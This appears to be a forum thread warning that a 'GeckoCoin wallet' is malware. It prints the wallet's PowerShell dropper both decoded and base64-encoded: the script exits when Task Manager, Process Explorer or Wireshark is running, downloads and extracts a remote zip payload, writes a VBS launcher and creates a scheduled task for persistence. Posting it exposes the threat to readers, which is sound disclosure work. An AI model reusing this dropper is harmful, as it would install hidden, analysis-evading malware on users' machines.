If (Get-Process -Name 'Taskmgr', 'perfmon', 'ProcessHacker', 'TMX64', 'TMX', 'procexp64a', 'procexp64', 'procexp', 'ProcessExplorerPortable', 'SystemExplorerPortable', 'SystemExplorer', 'EXEExplorerPort', 'EXE', 'EXE64', 'TaskManagerPort', 'KillProcess', 'TaskMan', 'WinUtilitiesPortable', 'WinUtil', 'FreeTaskManager', 'AnVir', 'anvir64', 'Wireshark' -ErrorAction SilentlyContinue){exit} Else {if( !((Test-Path -Path "$env:APPDATA\LogState\htMbZp.py" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\ws2help.exe" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\jLherYu.vbs" -PathType Leaf))){schtasks /delete /tn "ImDskSvc\wmiApSrv" /f;Stop-Process -Name "ws2help";Remove-Item -Recurse -Force "$env:APPDATA\LogState";New-Item -ItemType Directory -Force -Path "$env:APPDATA\LogState";$addPath = "$env:APPDATA\LogState\jLherYu.vbs"; $text = "Option Explicit";$text2 = "Dim ProcessPath";$text3 = "Dim fileSystemObject";$text4 = "Dim strAppDataPath";$text5 = "ProcessPath = `"ws2help.exe`"";$text6 = "Call CheckProcess(DblQuote(ProcessPath))";$text7 = "Sub CheckProcess(ProcessPath)";$text8 = "Dim strComputer,objWMIService,colProcesses,WshShell,Tab,ProcessName";$text9 = "strComputer = `".`"";$text10 = "Tab = Split(ProcessPath,`"\`")";$text11 = "ProcessName = Tab(UBound(Tab))";$text12 = "ProcessName = Replace(ProcessName,Chr(34),`"`")";$text13 = "Set objWMIService = GetObject(`"winmgmts:`" _";$text14 = "& `"{impersonationLevel=impersonate}!\\`" & strComputer & `"\root\cimv2`")";$text15 = "Set colProcesses = objWMIService.ExecQuery _";$text16 = "(`"Select * from Win32_Process Where Name = '`"& ProcessName & `"'`")";$text17 = "Set fileSystemObject = CreateObject(`"Scripting.FileSystemObject`")";$text18 = "strAppDataPath = CreateObject(`"WScript.Shell`").ExpandEnvironmentStrings(`"%appdata%`")";$text19 = "If colProcesses.Count = 0 And fileSystemObject.FileExists(strAppDataPath & `"\LogState\htMbZp.py`") Then";$text20 = "Set WshShell = CreateObject(`"WScript.Shell`")";$text21 = "WshShell.Run `"cmd /c %appdata%\LogState\ws2help.exe %appdata%\LogState\htMbZp.py`", 0, False";$text22 = "Else";$text23 = "Exit Sub";$text24 = "End if";$text25 = "End Sub";$text26 = "Function DblQuote(Str)";$text27 = "DblQuote = Chr(34) & Str & Chr(34)";$text28 = "End Function";echo $text $text2 $text3 $text4 $text5 $text6 $text7 $text8 $text9 $text10 $text11 $text12 $text13 $text14 $text15 $text16 $text17 $text18 $text19 $text20 $text21 $text22 $text23 $text24 $text25 $text26 $text27 $text28 | Out-File $addPath;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri "http://REMOVED.net/bootstrap.zip" -OutFile "$env:TEMP\bootstrap.zip";Expand-Archive -Path "$env:TEMP\bootstrap.zip" -DestinationPath "$env:APPDATA\LogState" -Force;schtasks /create /sc minute /mo 10 /tn "ImDskSvc\wmiApSrv" /tr "$env:APPDATA\LogState\jLherYu.vbs" /f } else {Start-Process -FilePath "$env:APPDATA\LogState\jLherYu.vbs";break}}
Stop writing this lies everywhere, give video evidence, if you have any at all
Check out the virustotal link earlier in the topic, specifically the behavior one.
GeckoCoin wallet executes this line:
C:\Windows\System32\cmd.exe /C powershell.exe -exec bypass -enc SQBmACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAnAFQAYQBzAGsAbQBnAHIAJwAsACAAJwBwAGUAcgBmAG0AbwBuACcALAAgACcAUAByAG8AYwBlAHMAcwBIAGEAYwBrAGUAcgAnACwAIAAnAFQATQBYADYANAAnACwAIAAnAFQATQBYACcALAAgACcAcAByAG8AYwBlAHgAcAA2ADQAYQAnACwAIAAnAHAAcgBvAGMAZQB4AHAANgA0ACcALAAgACcAcAByAG8AYwBlAHgAcAAnACwAIAAnAFAAcgBvAGMAZQBzAHMARQB4AHAAbABvAHIAZQByAFAAbwByAHQAYQBiAGwAZQAnACwAIAAnAFMAeQBzAHQAZQBtAEUAeABwAGwAbwByAGUAcgBQAG8AcgB0AGEAYgBsAGUAJwAsACAAJwBTAHkAcwB0AGUAbQBFAHgAcABsAG8AcgBlAHIAJwAsACAAJwBFAFgARQBFAHgAcABsAG8AcgBlAHIAUABvAHIAdAAnACwAIAAnAEUAWABFACcALAAgACcARQBYAEUANgA0ACcALAAgACcAVABhAHMAawBNAGEAbgBhAGcAZQByAFAAbwByAHQAJwAsACAAJwBLAGkAbABsAFAAcgBvAGMAZQBzAHMAJwAsACAAJwBUAGEAcwBrAE0AYQBuACcALAAgACcAVwBpAG4AVQB0AGkAbABpAHQAaQBlAHMAUABvAHIAdABhAGIAbABlACcALAAgACcAVwBpAG4AVQB0AGkAbAAnACwAIAAnAEYAcgBlAGUAVABhAHMAawBNAGEAbgBhAGcAZQByACcALAAgACcAQQBuAFYAaQByACcALAAgACcAYQBuAHYAaQByADYANAAnACwAIAAnAFcAaQByAGUAcwBoAGEAcgBrACcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQB7AGUAeABpAHQAfQAgAEUAbABzAGUAIAB7AGkAZgAoACAAIQAoACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAaAB0AE0AYgBaAHAALgBwAHkAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAALQBhAG4AZAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQAgAC0AYQBuAGQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQApAHsAcwBjAGgAdABhAHMAawBzACAALwBkAGUAbABlAHQAZQAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AZgA7AFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAIgB3AHMAMgBoAGUAbABwACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7AE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7ACQAYQBkAGQAUABhAHQAaAAgAD0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAagBMAGgAZQByAFkAdQAuAHYAYgBzACIAOwAgACQAdABlAHgAdAAgAD0AIAAiAE8AcAB0AGkAbwBuACAARQB4AHAAbABpAGMAaQB0ACIAOwAkAHQAZQB4AHQAMgAgAD0AIAAiAEQAaQBtACAAUAByAG8AYwBlAHMAcwBQAGEAdABoACIAOwAkAHQAZQB4AHQAMwAgAD0AIAAiAEQAaQBtACAAZgBpAGwAZQBTAHkAcwB0AGUAbQBPAGIAagBlAGMAdAAiADsAJAB0AGUAeAB0ADQAIAA9ACAAIgBEAGkAbQAgAHMAdAByAEEAcABwAEQAYQB0AGEAUABhAHQAaAAiADsAJAB0AGUAeAB0ADUAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAFAAYQB0AGgAIAA9ACAAYAAiAHcAcwAyAGgAZQBsAHAALgBlAHgAZQBgACIAIgA7ACQAdABlAHgAdAA2ACAAPQAgACIAQwBhAGwAbAAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgARABiAGwAUQB1AG8AdABlACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAKQAiADsAJAB0AGUAeAB0ADcAIAA9ACAAIgBTAHUAYgAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAIgA7ACQAdABlAHgAdAA4ACAAPQAgACIARABpAG0AIABzAHQAcgBDAG8AbQBwAHUAdABlAHIALABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlACwAYwBvAGwAUAByAG8AYwBlAHMAcwBlAHMALABXAHMAaABTAGgAZQBsAGwALABUAGEAYgAsAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAiADsAJAB0AGUAeAB0ADkAIAA9ACAAIgBzAHQAcgBDAG8AbQBwAHUAdABlAHIAIAA9ACAAYAAiAC4AYAAiACIAOwAkAHQAZQB4AHQAMQAwACAAPQAgACIAVABhAGIAIAA9ACAAUwBwAGwAaQB0ACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACwAYAAiAFwAYAAiACkAIgA7ACQAdABlAHgAdAAxADEAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAA9ACAAVABhAGIAKABVAEIAbwB1AG4AZAAoAFQAYQBiACkAKQAiADsAJAB0AGUAeAB0ADEAMgAgAD0AIAAiAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgAD0AIABSAGUAcABsAGEAYwBlACgAUAByAG8AYwBlAHMAcwBOAGEAbQBlACwAQwBoAHIAKAAzADQAKQAsAGAAIgBgACIAKQAiADsAJAB0AGUAeAB0ADEAMwAgAD0AIAAiAFMAZQB0ACAAbwBiAGoAVwBNAEkAUwBlAHIAdgBpAGMAZQAgAD0AIABHAGUAdABPAGIAagBlAGMAdAAoAGAAIgB3AGkAbgBtAGcAbQB0AHMAOgBgACIAIABfACIAOwAkAHQAZQB4AHQAMQA0ACAAPQAgACIAJgAgAGAAIgB7AGkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4ATABlAHYAZQBsAD0AaQBtAHAAZQByAHMAbwBuAGEAdABlAH0AIQBcAFwAYAAiACAAJgAgAHMAdAByAEMAbwBtAHAAdQB0AGUAcgAgACYAIABgACIAXAByAG8AbwB0AFwAYwBpAG0AdgAyAGAAIgApACIAOwAkAHQAZQB4AHQAMQA1ACAAPQAgACIAUwBlAHQAIABjAG8AbABQAHIAbwBjAGUAcwBzAGUAcwAgAD0AIABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlAC4ARQB4AGUAYwBRAHUAZQByAHkAIABfACIAOwAkAHQAZQB4AHQAMQA2ACAAPQAgACIAKABgACIAUwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIABXAGgAZQByAGUAIABOAGEAbQBlACAAPQAgACcAYAAiACYAIABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAAmACAAYAAiACcAYAAiACkAIgA7ACQAdABlAHgAdAAxADcAIAA9ACAAIgBTAGUAdAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQAIAA9ACAAQwByAGUAYQB0AGUATwBiAGoAZQBjAHQAKABgACIAUwBjAHIAaQBwAHQAaQBuAGcALgBGAGkAbABlAFMAeQBzAHQAZQBtAE8AYgBqAGUAYwB0AGAAIgApACIAOwAkAHQAZQB4AHQAMQA4ACAAPQAgACIAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkALgBFAHgAcABhAG4AZABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAUwB0AHIAaQBuAGcAcwAoAGAAIgAlAGEAcABwAGQAYQB0AGEAJQBgACIAKQAiADsAJAB0AGUAeAB0ADEAOQAgAD0AIAAiAEkAZgAgAGMAbwBsAFAAcgBvAGMAZQBzAHMAZQBzAC4AQwBvAHUAbgB0ACAAPQAgADAAIABBAG4AZAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQALgBGAGkAbABlAEUAeABpAHMAdABzACgAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAJgAgAGAAIgBcAEwAbwBnAFMAdABhAHQAZQBcAGgAdABNAGIAWgBwAC4AcAB5AGAAIgApACAAVABoAGUAbgAiADsAJAB0AGUAeAB0ADIAMAAgAD0AIAAiAFMAZQB0ACAAVwBzAGgAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkAIgA7ACQAdABlAHgAdAAyADEAIAA9ACAAIgBXAHMAaABTAGgAZQBsAGwALgBSAHUAbgAgAGAAIgBjAG0AZAAgAC8AYwAgACUAYQBwAHAAZABhAHQAYQAlAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACAAJQBhAHAAcABkAGEAdABhACUAXABMAG8AZwBTAHQAYQB0AGUAXABoAHQATQBiAFoAcAAuAHAAeQBgACIALAAgADAALAAgAEYAYQBsAHMAZQAiADsAJAB0AGUAeAB0ADIAMgAgAD0AIAAiAEUAbABzAGUAIgA7ACQAdABlAHgAdAAyADMAIAA9ACAAIgBFAHgAaQB0ACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADQAIAA9ACAAIgBFAG4AZAAgAGkAZgAiADsAJAB0AGUAeAB0ADIANQAgAD0AIAAiAEUAbgBkACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADYAIAA9ACAAIgBGAHUAbgBjAHQAaQBvAG4AIABEAGIAbABRAHUAbwB0AGUAKABTAHQAcgApACIAOwAkAHQAZQB4AHQAMgA3ACAAPQAgACIARABiAGwAUQB1AG8AdABlACAAPQAgAEMAaAByACgAMwA0ACkAIAAmACAAUwB0AHIAIAAmACAAQwBoAHIAKAAzADQAKQAiADsAJAB0AGUAeAB0ADIAOAAgAD0AIAAiAEUAbgBkACAARgB1AG4AYwB0AGkAbwBuACIAOwBlAGMAaABvACAAJAB0AGUAeAB0ACAAJAB0AGUAeAB0ADIAIAAkAHQAZQB4AHQAMwAgACQAdABlAHgAdAA0ACAAJAB0AGUAeAB0ADUAIAAkAHQAZQB4AHQANgAgACQAdABlAHgAdAA3ACAAJAB0AGUAeAB0ADgAIAAkAHQAZQB4AHQAOQAgACQAdABlAHgAdAAxADAAIAAkAHQAZQB4AHQAMQAxACAAJAB0AGUAeAB0ADEAMgAgACQAdABlAHgAdAAxADMAIAAkAHQAZQB4AHQAMQA0ACAAJAB0AGUAeAB0ADEANQAgACQAdABlAHgAdAAxADYAIAAkAHQAZQB4AHQAMQA3ACAAJAB0AGUAeAB0ADEAOAAgACQAdABlAHgAdAAxADkAIAAkAHQAZQB4AHQAMgAwACAAJAB0AGUAeAB0ADIAMQAgACQAdABlAHgAdAAyADIAIAAkAHQAZQB4AHQAMgAzACAAJAB0AGUAeAB0ADIANAAgACQAdABlAHgAdAAyADUAIAAkAHQAZQB4AHQAMgA2ACAAJAB0AGUAeAB0ADIANwAgACQAdABlAHgAdAAyADgAIAB8ACAATwB1AHQALQBGAGkAbABlACAAJABhAGQAZABQAGEAdABoADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHUAcABkAGEAdABlAC4AYQBpAHIAZAByAG8AcABlAHIALgBuAGUAdAAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AegBpAHAAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXABiAG8AbwB0AHMAdAByAGEAcAAuAHoAaQBwACIAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYgBvAG8AdABzAHQAcgBhAHAALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgAgAC0ARgBvAHIAYwBlADsAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AcwBjACAAbQBpAG4AdQB0AGUAIAAvAG0AbwAgADEAMAAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AdAByACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALwBmACAAfQAgAGUAbABzAGUAIAB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAXABqAEwAaABlAHIAWQB1AC4AdgBiAHMAIgA7AGIAcgBlAGEAawB9AH0A
That is a base64 encoded line, that you can decode easily to see for your selves. On linux you can run the below line, or you can use something like https://www.base64decode.org/, just set the source character set to auto-detect.
echo SQBmACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAnAFQAYQBzAGsAbQBnAHIAJwAsACAAJwBwAGUAcgBmAG0AbwBuACcALAAgACcAUAByAG8AYwBlAHMAcwBIAGEAYwBrAGUAcgAnACwAIAAnAFQATQBYADYANAAnACwAIAAnAFQATQBYACcALAAgACcAcAByAG8AYwBlAHgAcAA2ADQAYQAnACwAIAAnAHAAcgBvAGMAZQB4AHAANgA0ACcALAAgACcAcAByAG8AYwBlAHgAcAAnACwAIAAnAFAAcgBvAGMAZQBzAHMARQB4AHAAbABvAHIAZQByAFAAbwByAHQAYQBiAGwAZQAnACwAIAAnAFMAeQBzAHQAZQBtAEUAeABwAGwAbwByAGUAcgBQAG8AcgB0AGEAYgBsAGUAJwAsACAAJwBTAHkAcwB0AGUAbQBFAHgAcABsAG8AcgBlAHIAJwAsACAAJwBFAFgARQBFAHgAcABsAG8AcgBlAHIAUABvAHIAdAAnACwAIAAnAEUAWABFACcALAAgACcARQBYAEUANgA0ACcALAAgACcAVABhAHMAawBNAGEAbgBhAGcAZQByAFAAbwByAHQAJwAsACAAJwBLAGkAbABsAFAAcgBvAGMAZQBzAHMAJwAsACAAJwBUAGEAcwBrAE0AYQBuACcALAAgACcAVwBpAG4AVQB0AGkAbABpAHQAaQBlAHMAUABvAHIAdABhAGIAbABlACcALAAgACcAVwBpAG4AVQB0AGkAbAAnACwAIAAnAEYAcgBlAGUAVABhAHMAawBNAGEAbgBhAGcAZQByACcALAAgACcAQQBuAFYAaQByACcALAAgACcAYQBuAHYAaQByADYANAAnACwAIAAnAFcAaQByAGUAcwBoAGEAcgBrACcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQB7AGUAeABpAHQAfQAgAEUAbABzAGUAIAB7AGkAZgAoACAAIQAoACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAaAB0AE0AYgBaAHAALgBwAHkAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAALQBhAG4AZAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQAgAC0AYQBuAGQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQApAHsAcwBjAGgAdABhAHMAawBzACAALwBkAGUAbABlAHQAZQAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AZgA7AFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAIgB3AHMAMgBoAGUAbABwACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7AE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7ACQAYQBkAGQAUABhAHQAaAAgAD0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAagBMAGgAZQByAFkAdQAuAHYAYgBzACIAOwAgACQAdABlAHgAdAAgAD0AIAAiAE8AcAB0AGkAbwBuACAARQB4AHAAbABpAGMAaQB0ACIAOwAkAHQAZQB4AHQAMgAgAD0AIAAiAEQAaQBtACAAUAByAG8AYwBlAHMAcwBQAGEAdABoACIAOwAkAHQAZQB4AHQAMwAgAD0AIAAiAEQAaQBtACAAZgBpAGwAZQBTAHkAcwB0AGUAbQBPAGIAagBlAGMAdAAiADsAJAB0AGUAeAB0ADQAIAA9ACAAIgBEAGkAbQAgAHMAdAByAEEAcABwAEQAYQB0AGEAUABhAHQAaAAiADsAJAB0AGUAeAB0ADUAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAFAAYQB0AGgAIAA9ACAAYAAiAHcAcwAyAGgAZQBsAHAALgBlAHgAZQBgACIAIgA7ACQAdABlAHgAdAA2ACAAPQAgACIAQwBhAGwAbAAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgARABiAGwAUQB1AG8AdABlACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAKQAiADsAJAB0AGUAeAB0ADcAIAA9ACAAIgBTAHUAYgAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAIgA7ACQAdABlAHgAdAA4ACAAPQAgACIARABpAG0AIABzAHQAcgBDAG8AbQBwAHUAdABlAHIALABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlACwAYwBvAGwAUAByAG8AYwBlAHMAcwBlAHMALABXAHMAaABTAGgAZQBsAGwALABUAGEAYgAsAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAiADsAJAB0AGUAeAB0ADkAIAA9ACAAIgBzAHQAcgBDAG8AbQBwAHUAdABlAHIAIAA9ACAAYAAiAC4AYAAiACIAOwAkAHQAZQB4AHQAMQAwACAAPQAgACIAVABhAGIAIAA9ACAAUwBwAGwAaQB0ACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACwAYAAiAFwAYAAiACkAIgA7ACQAdABlAHgAdAAxADEAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAA9ACAAVABhAGIAKABVAEIAbwB1AG4AZAAoAFQAYQBiACkAKQAiADsAJAB0AGUAeAB0ADEAMgAgAD0AIAAiAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgAD0AIABSAGUAcABsAGEAYwBlACgAUAByAG8AYwBlAHMAcwBOAGEAbQBlACwAQwBoAHIAKAAzADQAKQAsAGAAIgBgACIAKQAiADsAJAB0AGUAeAB0ADEAMwAgAD0AIAAiAFMAZQB0ACAAbwBiAGoAVwBNAEkAUwBlAHIAdgBpAGMAZQAgAD0AIABHAGUAdABPAGIAagBlAGMAdAAoAGAAIgB3AGkAbgBtAGcAbQB0AHMAOgBgACIAIABfACIAOwAkAHQAZQB4AHQAMQA0ACAAPQAgACIAJgAgAGAAIgB7AGkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4ATABlAHYAZQBsAD0AaQBtAHAAZQByAHMAbwBuAGEAdABlAH0AIQBcAFwAYAAiACAAJgAgAHMAdAByAEMAbwBtAHAAdQB0AGUAcgAgACYAIABgACIAXAByAG8AbwB0AFwAYwBpAG0AdgAyAGAAIgApACIAOwAkAHQAZQB4AHQAMQA1ACAAPQAgACIAUwBlAHQAIABjAG8AbABQAHIAbwBjAGUAcwBzAGUAcwAgAD0AIABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlAC4ARQB4AGUAYwBRAHUAZQByAHkAIABfACIAOwAkAHQAZQB4AHQAMQA2ACAAPQAgACIAKABgACIAUwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIABXAGgAZQByAGUAIABOAGEAbQBlACAAPQAgACcAYAAiACYAIABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAAmACAAYAAiACcAYAAiACkAIgA7ACQAdABlAHgAdAAxADcAIAA9ACAAIgBTAGUAdAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQAIAA9ACAAQwByAGUAYQB0AGUATwBiAGoAZQBjAHQAKABgACIAUwBjAHIAaQBwAHQAaQBuAGcALgBGAGkAbABlAFMAeQBzAHQAZQBtAE8AYgBqAGUAYwB0AGAAIgApACIAOwAkAHQAZQB4AHQAMQA4ACAAPQAgACIAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkALgBFAHgAcABhAG4AZABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAUwB0AHIAaQBuAGcAcwAoAGAAIgAlAGEAcABwAGQAYQB0AGEAJQBgACIAKQAiADsAJAB0AGUAeAB0ADEAOQAgAD0AIAAiAEkAZgAgAGMAbwBsAFAAcgBvAGMAZQBzAHMAZQBzAC4AQwBvAHUAbgB0ACAAPQAgADAAIABBAG4AZAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQALgBGAGkAbABlAEUAeABpAHMAdABzACgAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAJgAgAGAAIgBcAEwAbwBnAFMAdABhAHQAZQBcAGgAdABNAGIAWgBwAC4AcAB5AGAAIgApACAAVABoAGUAbgAiADsAJAB0AGUAeAB0ADIAMAAgAD0AIAAiAFMAZQB0ACAAVwBzAGgAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkAIgA7ACQAdABlAHgAdAAyADEAIAA9ACAAIgBXAHMAaABTAGgAZQBsAGwALgBSAHUAbgAgAGAAIgBjAG0AZAAgAC8AYwAgACUAYQBwAHAAZABhAHQAYQAlAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACAAJQBhAHAAcABkAGEAdABhACUAXABMAG8AZwBTAHQAYQB0AGUAXABoAHQATQBiAFoAcAAuAHAAeQBgACIALAAgADAALAAgAEYAYQBsAHMAZQAiADsAJAB0AGUAeAB0ADIAMgAgAD0AIAAiAEUAbABzAGUAIgA7ACQAdABlAHgAdAAyADMAIAA9ACAAIgBFAHgAaQB0ACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADQAIAA9ACAAIgBFAG4AZAAgAGkAZgAiADsAJAB0AGUAeAB0ADIANQAgAD0AIAAiAEUAbgBkACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADYAIAA